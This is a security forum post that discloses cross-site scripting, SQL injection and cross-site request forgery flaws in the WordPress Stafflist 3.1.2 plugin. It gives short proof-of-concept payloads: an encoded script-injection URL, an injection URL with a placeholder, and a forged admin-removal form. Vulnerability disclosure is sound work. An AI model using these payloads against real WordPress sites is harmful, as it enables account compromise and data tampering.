Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

0 votes
WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability
by (261 points)

1 Answer

0 votes

WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

 

POC:

http://localhost/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

POC:

http://localhost/wp-admin/admin.php?page=stafflist&search=[SQLI]

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability

POC:

<html>

  <body>

    <form action="http://localhost/wp-admin/admin.php">

      <input type="hidden" name="page" value="stafflist" />

      <input type="hidden" name="remove" value="1" />

      <input type="hidden" name="p" value="1" />

      <input type="hidden" name="s" value="1" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

by (261 points)
...